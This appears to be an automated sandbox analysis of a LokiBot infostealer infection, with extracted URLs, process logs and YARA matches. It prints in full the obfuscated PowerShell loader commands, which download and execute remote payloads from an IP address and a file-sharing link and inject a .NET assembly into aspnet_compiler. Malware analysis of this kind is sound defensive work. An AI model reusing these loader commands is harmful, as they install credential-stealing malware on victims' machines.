Source: powershell.exe, 00000001.00000002.2192931283.00000000053A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/32/seemybes
Source: powershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/32/seemybestthingswithentirelifetimU&
Source: powershell.exe, 00000001.00000002.2204058634.000000000741E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIF
Source: powershell.exe, 00000001.00000002.2204284614.000000000744D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFility
Source: powershell.exe, 00000001.00000002.2204284614.000000000744D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFon
Source: powershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/cate
Source: powershell.exe, 00000001.00000002.2192280720.0000000003109000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000009.00000002.2379784762.0000000006C83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microG
Source: powershell.exe, 00000003.00000002.2088278913.0000000007FB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000003.00000002.2077991615.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000001.00000002.2201742184.0000000005B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082785336.000000000588A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.2192931283.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2077991615.0000000004821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2713596116.0000000004F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.0000000004641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com
Source: powershell.exe, 00000009.00000002.2324609506.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT
Source: powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
Source: powershell.exe, 00000009.00000002.2380660733.0000000006D11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnt
Source: powershell.exe, 00000007.00000002.2713596116.0000000004F36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6LR
Source: powershell.exe, 00000001.00000002.2192931283.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2077991615.0000000004821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2713596116.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.0000000004641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2192931283.00000000053A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2204284614.00000000074C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000001.00000002.2201742184.0000000005B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082785336.000000000588A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.5:49705 version: TLS 1.2

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'\|'))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'\|'))"	Jump to behavior

Malicious sample detected (through community Yara rule)

Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
